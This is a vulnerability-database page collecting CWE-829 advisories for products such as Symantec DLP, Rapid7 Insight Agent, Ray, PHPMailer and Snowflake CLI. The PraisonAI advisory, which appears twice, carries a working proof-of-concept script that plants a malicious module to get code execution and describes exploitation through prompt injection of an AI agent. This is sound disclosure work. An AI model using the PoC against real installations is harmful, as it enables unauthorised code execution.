Common Weakness Enumeration

CWE-829

Allowed

Inclusion of Functionality from Untrusted Control Sphere

Abstraction: Base · Status: Incomplete

The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.

393 vulnerabilities reference this CWE, most recent first.

GHSA-6R2P-X2M4-J49C

Vulnerability from github – Published: 2026-03-30 21:31 – Updated: 2026-03-30 21:31
VLAI
Details

Symantec Data Loss Prevention Windows Endpoint, prior to 25.1 MP1, 16.1 MP2, 16.0 RU2 HF9, 16.0 RU1 MP1 HF12, and 16.0 MP2 HF15, may be susceptible to a Elevation of Privilege vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-3991"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-829"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-30T19:16:27Z",
    "severity": "HIGH"
  },
  "details": "Symantec Data Loss Prevention Windows Endpoint, prior to 25.1 MP1, 16.1 MP2, 16.0 RU2 HF9, 16.0 RU1 MP1 HF12, and 16.0 MP2 HF15, may be susceptible to a Elevation of Privilege vulnerability, which is a type of issue whereby an attacker may attempt to compromise the software application to gain elevated access to resources that are normally protected from an application or user.",
  "id": "GHSA-6r2p-x2m4-j49c",
  "modified": "2026-03-30T21:31:04Z",
  "published": "2026-03-30T21:31:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3991"
    },
    {
      "type": "WEB",
      "url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37306"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6RGM-MXX7-QXMC

Vulnerability from github – Published: 2026-04-17 06:31 – Updated: 2026-04-28 18:30
VLAI
Details

The Rapid7 Insight Agent (versions > 4.1.0.2) is vulnerable to a local privilege escalation attack that allows users to gain SYSTEM level control of a Windows host. Upon startup the agent service attempts to load an OpenSSL configuration file from a non-existent directory that is writable by standard users. By planting a crafted openssl.cnf file an attacker can trick the high-privilege service into executing arbitrary commands. This effectively permits an unprivileged user to bypass security controls and achieve a full host compromise under the agent’s SYSTEM level access.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-6482"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-829"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-17T06:16:30Z",
    "severity": "HIGH"
  },
  "details": "The Rapid7 Insight Agent (versions \u003e 4.1.0.2) is vulnerable to a local privilege escalation attack that allows users to gain SYSTEM\u00a0level control of a Windows host. Upon startup the agent service attempts to load an OpenSSL configuration file from a non-existent directory that is writable by standard users. By planting a crafted openssl.cnf file an attacker can trick the high-privilege service into executing arbitrary commands. This effectively permits an unprivileged user to bypass security controls and achieve a full host compromise under the agent\u2019s SYSTEM level access.",
  "id": "GHSA-6rgm-mxx7-qxmc",
  "modified": "2026-04-28T18:30:28Z",
  "published": "2026-04-17T06:31:08Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6482"
    },
    {
      "type": "WEB",
      "url": "https://docs.rapid7.com/insight/release-notes-2026-april/#improvements-and-fixes"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-6VRG-RVC9-7GXH

Vulnerability from github – Published: 2022-05-24 19:08 – Updated: 2022-05-24 19:08
VLAI
Details

A local file inclusion (LFI) vulnerability exists in the options.php script functionality of Advantech R-SeeNet v 2.4.12 (20.10.2020). A specially crafted HTTP request can lead to arbitrary PHP code execution. An attacker can send a crafted HTTP request to trigger this vulnerability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-21804"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-829"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-07-16T11:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "A local file inclusion (LFI) vulnerability exists in the options.php script functionality of Advantech R-SeeNet v 2.4.12 (20.10.2020). A specially crafted HTTP request can lead to arbitrary PHP code execution. An attacker can send a crafted HTTP request to trigger this vulnerability.",
  "id": "GHSA-6vrg-rvc9-7gxh",
  "modified": "2022-05-24T19:08:18Z",
  "published": "2022-05-24T19:08:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21804"
    },
    {
      "type": "WEB",
      "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2021-1273"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6WGJ-66M2-XXP2

Vulnerability from github – Published: 2023-11-28 09:30 – Updated: 2025-12-20 05:01
VLAI
Summary
Ray has arbitrary code execution via jobs submission API
Details

Anyscale Ray allows a remote attacker to execute arbitrary code via the job submission API. NOTE: the vendor's position is that this report is irrelevant because Ray, as stated in its documentation, is not intended for use outside of a strictly controlled network environment.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "ray"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.49.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-48022"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-829",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-30T18:19:55Z",
    "nvd_published_at": "2023-11-28T08:15:06Z",
    "severity": "CRITICAL"
  },
  "details": "Anyscale Ray allows a remote attacker to execute arbitrary code via the job submission API. NOTE: the vendor\u0027s position is that this report is irrelevant because Ray, as stated in its documentation, is not intended for use outside of a strictly controlled network environment.",
  "id": "GHSA-6wgj-66m2-xxp2",
  "modified": "2025-12-20T05:01:40Z",
  "published": "2023-11-28T09:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-48022"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ray-project/ray/commit/978947083b1e192dba61ef653c863b11d56b0936"
    },
    {
      "type": "WEB",
      "url": "https://atlas.mitre.org/studies/AML.CS0023"
    },
    {
      "type": "WEB",
      "url": "https://bishopfox.com/blog/ray-versions-2-6-3-2-8-0"
    },
    {
      "type": "WEB",
      "url": "https://console.vulncheck.com/cve/CVE-2023-48022"
    },
    {
      "type": "WEB",
      "url": "https://docs.ray.io/en/latest/ray-security/index.html"
    },
    {
      "type": "WEB",
      "url": "https://docs.ray.io/en/latest/ray-security/token-auth.html"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-xg2h-7cxj-3gvh"
    },
    {
      "type": "WEB",
      "url": "https://github.com/honysyang/Ray"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ray-project/ray"
    },
    {
      "type": "WEB",
      "url": "https://www.anyscale.com/blog/update-on-ray-cve-2023-48022-new-verification-tooling-available"
    },
    {
      "type": "WEB",
      "url": "https://www.oligo.security/blog/shadowray-attack-ai-workloads-actively-exploited-in-the-wild"
    },
    {
      "type": "WEB",
      "url": "https://www.vicarius.io/vsociety/posts/shadowray-cve-2023-48022-exploit"
    },
    {
      "type": "WEB",
      "url": "https://www.vicarius.io/vsociety/posts/the-story-of-shadowray-cve-2023-48022"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/blog/initial-access-intelligence-august-2024"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Ray has arbitrary code execution via jobs submission API"
}

GHSA-6XPV-FWH6-29JC

Vulnerability from github – Published: 2026-06-29 18:31 – Updated: 2026-06-29 18:31
VLAI
Details

Improper handling of untrusted remote references in Snowflake CLI versions prior to 3.19 allowed server-side request forgery. The SQL statement reader's !source/!load directives could reference remote URLs that were retrieved at runtime without sufficient restriction on the request destination. By supplying crafted SQL content processed through a vulnerable command path, an attacker could cause the victim's environment to issue unintended outbound requests to internal or otherwise non-public network locations, and could cause remote SQL content to be retrieved and executed in the context of the victim user's session. Successful exploitation requires the victim to process attacker-controlled content through a vulnerable command path and is limited by the privileges available to that session and environment. The fix is available in Snowflake CLI version 3.19, which adds an option to disable remote URL retrieval.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-13751"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-829"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-29T17:16:30Z",
    "severity": "MODERATE"
  },
  "details": "Improper handling of untrusted remote references in Snowflake CLI versions prior to 3.19 allowed server-side request forgery. The SQL statement reader\u0027s !source/!load directives could reference remote URLs that were retrieved at runtime without sufficient restriction on the request destination. By supplying crafted SQL content processed through a vulnerable command path, an attacker could cause the victim\u0027s environment to issue unintended outbound requests to internal or otherwise non-public network locations, and could cause remote SQL content to be retrieved and executed in the context of the victim user\u0027s session. Successful exploitation requires the victim to process attacker-controlled content through a vulnerable command path and is limited by the privileges available to that session and environment. The fix is available in Snowflake CLI version 3.19, which adds an option to disable remote URL retrieval.",
  "id": "GHSA-6xpv-fwh6-29jc",
  "modified": "2026-06-29T18:31:54Z",
  "published": "2026-06-29T18:31:54Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13751"
    },
    {
      "type": "WEB",
      "url": "https://community.snowflake.com/s/article/Snowflake-CLI-Vulnerability-Advisory"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6XQV-9MPX-WXJP

Vulnerability from github – Published: 2022-05-24 19:21 – Updated: 2022-05-24 19:21
VLAI
Details

SAS/Intrnet 9.4 build 1520 and earlier allows Local File Inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro. Users can escape the context of the configured user-controllable variable and append additional functions native to the macro but not included as variables within the library. This includes a function that retrieves files from the host OS.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-41569"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-829"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-11-19T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "SAS/Intrnet 9.4 build 1520 and earlier allows Local File Inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro. Users can escape the context of the configured user-controllable variable and append additional functions native to the macro but not included as variables within the library. This includes a function that retrieves files from the host OS.",
  "id": "GHSA-6xqv-9mpx-wxjp",
  "modified": "2022-05-24T19:21:06Z",
  "published": "2022-05-24T19:21:06Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41569"
    },
    {
      "type": "WEB",
      "url": "https://support.sas.com/kb/68/641.html"
    },
    {
      "type": "WEB",
      "url": "https://www.mindpointgroup.com/blog/high-risk-vulnerability-discovery-localfileinclusion-sas"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-77MR-WC79-M8J3

Vulnerability from github – Published: 2021-06-22 15:18 – Updated: 2024-02-07 18:16
VLAI
Summary
PHPMailer untrusted code may be run from an overridden address validator
Details

If a function is defined that has the same name as the default built-in email address validation scheme (php), it will be called in default configuration as when no validation scheme is provided, the default scheme's callable php was being called. If an attacker is able to inject such a function into the application (a much bigger issue), it will be called whenever an email address is validated, such as when calling validateAddress().

Impact

Low impact – exploitation requires that an attacker can already inject code into an application, but it provides a trigger pathway.

Patches

This is patched in PHPMailer 6.5.0 by denying the use of simple strings as validator function names, which is a very minor BC break.

Workarounds

Inject your own email validator function.

References

Reported by Vikrant Singh Chauhan via huntr.dev. CVE-2021-3603

For more information

If you have any questions or comments about this advisory: * Open an issue in the PHPMailer project * Email us.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "phpmailer/phpmailer"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.5.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-3603"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-74",
      "CWE-829"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-06-16T19:49:12Z",
    "nvd_published_at": "2021-06-17T12:15:00Z",
    "severity": "HIGH"
  },
  "details": "If a function is defined that has the same name as the default built-in email address validation scheme (`php`), it will be called in default configuration as when no validation scheme is provided, the default scheme\u0027s callable `php` was being called. If an attacker is able to inject such a function into the application (a much bigger issue), it will be called whenever an email address is validated, such as when calling `validateAddress()`.\n\n### Impact\nLow impact \u2013 exploitation requires that an attacker can already inject code into an application, but it provides a trigger pathway.\n\n### Patches\nThis is patched in PHPMailer 6.5.0 by denying the use of simple strings as validator function names, which is a very minor BC break.\n\n### Workarounds\nInject your own email validator function.\n\n### References\nReported by [Vikrant Singh Chauhan](mailto:vi@hackberry.xyz) via [huntr.dev](https://www.huntr.dev/).\n[CVE-2021-3603](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3603)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)\n* [Email us](mailto:phpmailer@synchromedia.co.uk).\n",
  "id": "GHSA-77mr-wc79-m8j3",
  "modified": "2024-02-07T18:16:24Z",
  "published": "2021-06-22T15:18:02Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-77mr-wc79-m8j3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3603"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPMailer/PHPMailer/commit/45f3c18dc6a2de1cb1bf49b9b249a9ee36a5f7f3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/phpmailer/phpmailer/CVE-2021-3603.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/PHPMailer/PHPMailer"
    },
    {
      "type": "WEB",
      "url": "https://github.com/PHPMailer/PHPMailer/releases/tag/v6.5.0"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3YRMWGA4VTMXFB22KICMB7YMFZNFV3EJ"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FJYSOFCUBS67J3TKR74SD3C454N7VTYM"
    },
    {
      "type": "WEB",
      "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3603"
    },
    {
      "type": "WEB",
      "url": "https://www.huntr.dev/bounties/1-PHPMailer/PHPMailer"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PHPMailer untrusted code may be run from an overridden address validator"
}

GHSA-78R8-WWQV-R299

Vulnerability from github – Published: 2026-05-29 22:26 – Updated: 2026-05-29 22:26
VLAI
Summary
PraisonAI: Arbitrary code execution via unguarded `spec.loader.exec_module` in `agents_generator.py` - sibling of CVE-2026-44334
Details

Arbitrary code execution via ungated spec.loader.exec_module in agents_generator.py (v4.6.32 chokepoint refactor bypass)

Summary

The v4.6.32 chokepoint refactor (which patched CVE-2026-44334 / GHSA-xcmw-grxf-wjhj) added the PRAISONAI_ALLOW_LOCAL_TOOLS env-var gate to the tool_override.py sinks. However, two additional spec.loader.exec_module call sites in praisonai/agents_generator.py were missed and remain completely unguarded on current master (v4.6.37). Both functions accept a module_path parameter sourced from YAML configuration and execute it without validation, signature checking, or the env-var gate.

Patch lineage

CVE | GHSA | Fixed in | What was patched -- | -- | -- | -- CVE-2026-40156 | GHSA-2g3w-cpc4-chr4 | 4.5.128 | CWD tools.py auto-load in tool_resolver.py CVE-2026-40287 | GHSA-g985-wjh9-qxxc | 4.5.139 | Env-var gate added to tool_resolver.py + api/call.py CVE-2026-44334 | GHSA-xcmw-grxf-wjhj | 4.6.32 | Missed sink in templates/tool_override.py This finding | — | unfixed | Missed sinks in agents_generator.py

Every prior patch addressed a subset of exec_module call sites. The two sinks documented here were present throughout the entire fix sequence and remain unpatched.

Vulnerable code

# praisonai/agents_generator.py  (master HEAD; v4.6.37)

336    def load_tools_from_module(self, module_path):
           # ...
349        spec = importlib.util.spec_from_file_location("tools_module", module_path)
350        module = importlib.util.module_from_spec(spec)
351        spec.loader.exec_module(module)               # ← NO gate

372    def load_tools_from_module_class(self, module_path):
           # ...  (same pattern — spec_from_file_location → exec_module, no gate)

Neither function checks PRAISONAI_ALLOW_LOCAL_TOOLS. Neither validates module_path against an allowlist. The module_path value originates from YAML agent configuration (agents.yaml) tool definitions, which can be:

  1. Attacker-controlled via shared/writable config directory — same CWD-plant vector as CVE-2026-40156.
  2. Attacker-controlled via recipe/GitHub fetch — same remote trigger as CVE-2026-44334 (POST /v1/recipes/run with allow_any_github=True).
  3. Attacker-influenced via prompt injection — an LLM agent instructed to load tools from a crafted path reaches these functions through the agent orchestration layer.

Attack chain (recipe vector)

HTTP POST /v1/recipes/run
  body: {"recipe": "github:<attacker>/<repo>/<recipe>"}
        │
        ▼
  Recipe fetched → agents.yaml contains:
    tools:
      - module_path: ./evil.py        # colocated in recipe dir
        │
        ▼
  AgentsGenerator.load_tools_from_module("./evil.py")
        │
        ▼
  agents_generator.py:349   spec = spec_from_file_location("tools_module", "./evil.py")
  agents_generator.py:351   spec.loader.exec_module(module)   ← RCE

No PRAISONAI_ALLOW_LOCAL_TOOLS check. No auth required (legacy server default). Module-level code executes during tool registry construction, before any LLM call.

PoC

#!/usr/bin/env bash
# Requires: pip install praisonai (any version >= 2.0.0, <= 4.6.37)
set -euo pipefail

WORKDIR=$(mktemp -d)
trap "rm -rf $WORKDIR" EXIT

# 1. Malicious module
cat > "$WORKDIR/evil.py" << 'PYEOF'
import os, sys, tempfile, time
marker = os.path.join(tempfile.gettempdir(),
                      f"praisonai_agents_gen_pwn_{int(time.time())}.txt")
with open(marker, "w") as f:
    f.write(f"uid={os.getuid()} pid={os.getpid()} argv={sys.argv}\n")
print(f"[agents_generator bypass] RCE fired. Marker: {marker}", flush=True)

def dummy_tool():
    """Placeholder so tool scan finds something."""
    pass
PYEOF

# 2. agents.yaml that references it
cat > "$WORKDIR/agents.yaml" << 'YAMLEOF'
framework: praisonai
topic: "PoC — agents_generator exec_module bypass"
roles:
  poc_agent:
    role: PoC
    goal: Trigger load_tools_from_module
    backstory: n/a
    tools:
      - evil.py
YAMLEOF

# 3. Run
cd "$WORKDIR"
python -c "
from praisonai import PraisonAI
try:
    ai = PraisonAI(agent_file='agents.yaml')
    ai.main()
except Exception:
    pass  # downstream failure expected; exec_module already fired
"

# 4. Verify
MARKER=$(ls /tmp/praisonai_agents_gen_pwn_*.txt 2>/dev/null | tail -1)
if [ -n "$MARKER" ]; then
    echo "SUCCESS — marker file written by server process:"
    cat "$MARKER"
else
    echo "FAIL — marker not found"
    exit 1
fi

Impact

Arbitrary code execution with the privileges of the PraisonAI process. The attacker payload runs during tool registry construction — before any LLM interaction — so no API keys or model access are required for the exploit to succeed. In CI/CD and shared-server environments, any user who can write an agents.yaml or colocate a .py file achieves code execution as the service account.

Severity

High — CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (7.8)

When combined with the recipe server's default no-auth posture and allow_any_github=True, the attack becomes network-reachable without authentication, elevating to:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)

CWE

  • CWE-94: Improper Control of Generation of Code ('Code Injection')
  • CWE-426: Untrusted Search Path
  • CWE-829: Inclusion of Functionality from Untrusted Control Sphere

Affected versions

All versions containing agents_generator.py with these functions — at minimum >= 2.0.0, <= 4.6.37 (current master HEAD).

Suggested fix

Apply the same PRAISONAI_ALLOW_LOCAL_TOOLS env-var gate used in tool_resolver.py and api/call.py to both call sites in agents_generator.py:

import os

def load_tools_from_module(self, module_path):
    if os.environ.get("PRAISONAI_ALLOW_LOCAL_TOOLS", "").lower() != "true":
        return []
    # ... existing logic ...

def load_tools_from_module_class(self, module_path):
    if os.environ.get("PRAISONAI_ALLOW_LOCAL_TOOLS", "").lower() != "true":
        return []
    # ... existing logic ...

Additionally, validate module_path against a strict allowlist of expected tool module locations rather than accepting arbitrary filesystem paths.

Credit

Kai Aizen & Avraham Shemesh / SnailSploit

Arbitrary code execution via ungated spec.loader.exec_module in agents_generator.py (v4.6.32 chokepoint refactor bypass)

TL;DR

The v4.6.32 chokepoint refactor (which patched CVE-2026-44334 / GHSA-xcmw-grxf-wjhj) added the PRAISONAI_ALLOW_LOCAL_TOOLS env-var gate to the tool_override.py sinks. However, two additional spec.loader.exec_module call sites in praisonai/agents_generator.py were missed and remain completely unguarded on current master (v4.6.37). Both functions accept a module_path parameter sourced from YAML configuration and execute it without validation, signature checking, or the env-var gate.

Patch lineage

CVE GHSA Fixed in What was patched
CVE-2026-40156 GHSA-2g3w-cpc4-chr4 4.5.128 CWD tools.py auto-load in tool_resolver.py
CVE-2026-40287 GHSA-g985-wjh9-qxxc 4.5.139 Env-var gate added to tool_resolver.py + api/call.py
CVE-2026-44334 GHSA-xcmw-grxf-wjhj 4.6.32 Missed sink in templates/tool_override.py
This finding unfixed Missed sinks in agents_generator.py

Every prior patch addressed a subset of exec_module call sites. The two sinks documented here were present throughout the entire fix sequence and remain unpatched.

Vulnerable code

# praisonai/agents_generator.py  (master HEAD; v4.6.37)

336    def load_tools_from_module(self, module_path):
           # ...
349        spec = importlib.util.spec_from_file_location("tools_module", module_path)
350        module = importlib.util.module_from_spec(spec)
351        spec.loader.exec_module(module)               # ← NO gate

372    def load_tools_from_module_class(self, module_path):
           # ...  (same pattern — spec_from_file_location → exec_module, no gate)

Neither function checks PRAISONAI_ALLOW_LOCAL_TOOLS. Neither validates module_path against an allowlist. The module_path value originates from YAML agent configuration (agents.yaml) tool definitions, which can be:

  1. Attacker-controlled via shared/writable config directory — same CWD-plant vector as CVE-2026-40156.
  2. Attacker-controlled via recipe/GitHub fetch — same remote trigger as CVE-2026-44334 (POST /v1/recipes/run with allow_any_github=True).
  3. Attacker-influenced via prompt injection — an LLM agent instructed to load tools from a crafted path reaches these functions through the agent orchestration layer.

Attack chain (recipe vector)

HTTP POST /v1/recipes/run
  body: {"recipe": "github:<attacker>/<repo>/<recipe>"}
        │
        ▼
  Recipe fetched → agents.yaml contains:
    tools:
      - module_path: ./evil.py        # colocated in recipe dir
        │
        ▼
  AgentsGenerator.load_tools_from_module("./evil.py")
        │
        ▼
  agents_generator.py:349   spec = spec_from_file_location("tools_module", "./evil.py")
  agents_generator.py:351   spec.loader.exec_module(module)   ← RCE

No PRAISONAI_ALLOW_LOCAL_TOOLS check. No auth required (legacy server default). Module-level code executes during tool registry construction, before any LLM call.

PoC

#!/usr/bin/env bash
# Requires: pip install praisonai (any version >= 2.0.0, <= 4.6.37)
set -euo pipefail

WORKDIR=$(mktemp -d)
trap "rm -rf $WORKDIR" EXIT

# 1. Malicious module
cat > "$WORKDIR/evil.py" << 'PYEOF'
import os, sys, tempfile, time
marker = os.path.join(tempfile.gettempdir(),
                      f"praisonai_agents_gen_pwn_{int(time.time())}.txt")
with open(marker, "w") as f:
    f.write(f"uid={os.getuid()} pid={os.getpid()} argv={sys.argv}\n")
print(f"[agents_generator bypass] RCE fired. Marker: {marker}", flush=True)

def dummy_tool():
    """Placeholder so tool scan finds something."""
    pass
PYEOF

# 2. agents.yaml that references it
cat > "$WORKDIR/agents.yaml" << 'YAMLEOF'
framework: praisonai
topic: "PoC — agents_generator exec_module bypass"
roles:
  poc_agent:
    role: PoC
    goal: Trigger load_tools_from_module
    backstory: n/a
    tools:
      - evil.py
YAMLEOF

# 3. Run
cd "$WORKDIR"
python -c "
from praisonai import PraisonAI
try:
    ai = PraisonAI(agent_file='agents.yaml')
    ai.main()
except Exception:
    pass  # downstream failure expected; exec_module already fired
"

# 4. Verify
MARKER=$(ls /tmp/praisonai_agents_gen_pwn_*.txt 2>/dev/null | tail -1)
if [ -n "$MARKER" ]; then
    echo "SUCCESS — marker file written by server process:"
    cat "$MARKER"
else
    echo "FAIL — marker not found"
    exit 1
fi

Impact

Arbitrary code execution with the privileges of the PraisonAI process. The attacker payload runs during tool registry construction — before any LLM interaction — so no API keys or model access are required for the exploit to succeed. In CI/CD and shared-server environments, any user who can write an agents.yaml or colocate a .py file achieves code execution as the service account.

Severity

High — CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (7.8)

When combined with the recipe server's default no-auth posture and allow_any_github=True, the attack becomes network-reachable without authentication, elevating to:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)

CWE

  • CWE-94: Improper Control of Generation of Code ('Code Injection')
  • CWE-426: Untrusted Search Path
  • CWE-829: Inclusion of Functionality from Untrusted Control Sphere

Affected versions

All versions containing agents_generator.py with these functions — at minimum >= 2.0.0, <= 4.6.37 (current master HEAD).

Suggested fix

Apply the same PRAISONAI_ALLOW_LOCAL_TOOLS env-var gate used in tool_resolver.py and api/call.py to both call sites in agents_generator.py:

import os

def load_tools_from_module(self, module_path):
    if os.environ.get("PRAISONAI_ALLOW_LOCAL_TOOLS", "").lower() != "true":
        return []
    # ... existing logic ...

def load_tools_from_module_class(self, module_path):
    if os.environ.get("PRAISONAI_ALLOW_LOCAL_TOOLS", "").lower() != "true":
        return []
    # ... existing logic ...

Additionally, validate module_path against a strict allowlist of expected tool module locations rather than accepting arbitrary filesystem paths.

Credit

Kai Aizen & Avraham Shemesh / [SnailSploit](https://snailsploit.com/)

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.6.39"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "PraisonAI"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.6.40"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-47398"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-829",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-29T22:26:31Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "\u003chtml\u003e\u003chead\u003e\u003c/head\u003e\u003cbody\u003e\u003ch2\u003eArbitrary code execution via ungated \u003ccode\u003espec.loader.exec_module\u003c/code\u003e in \u003ccode\u003eagents_generator.py\u003c/code\u003e (v4.6.32 chokepoint refactor bypass)\u003c/h2\u003e\n\u003ch3\u003eSummary\u003c/h3\u003e\n\u003cp\u003eThe v4.6.32 chokepoint refactor (which patched CVE-2026-44334 / GHSA-xcmw-grxf-wjhj) added the \u003ccode\u003ePRAISONAI_ALLOW_LOCAL_TOOLS\u003c/code\u003e env-var gate to the \u003ccode\u003etool_override.py\u003c/code\u003e sinks. However, \u003cstrong\u003etwo additional \u003ccode\u003espec.loader.exec_module\u003c/code\u003e call sites\u003c/strong\u003e in \u003ccode\u003epraisonai/agents_generator.py\u003c/code\u003e were missed and remain completely unguarded on current \u003ccode\u003emaster\u003c/code\u003e (v4.6.37). Both functions accept a \u003ccode\u003emodule_path\u003c/code\u003e parameter sourced from YAML configuration and execute it without validation, signature checking, or the env-var gate.\u003c/p\u003e\n\u003ch3\u003ePatch lineage\u003c/h3\u003e\n\nCVE | GHSA | Fixed in | What was patched\n-- | -- | -- | --\nCVE-2026-40156 | GHSA-2g3w-cpc4-chr4 | 4.5.128 | CWD tools.py auto-load in tool_resolver.py\nCVE-2026-40287 | GHSA-g985-wjh9-qxxc | 4.5.139 | Env-var gate added to tool_resolver.py + api/call.py\nCVE-2026-44334 | GHSA-xcmw-grxf-wjhj | 4.6.32 | Missed sink in templates/tool_override.py\nThis finding | \u2014 | unfixed | Missed sinks in agents_generator.py\n\n\n\u003cp\u003eEvery prior patch addressed a subset of \u003ccode\u003eexec_module\u003c/code\u003e call sites. The two sinks documented here were present throughout the entire fix sequence and remain 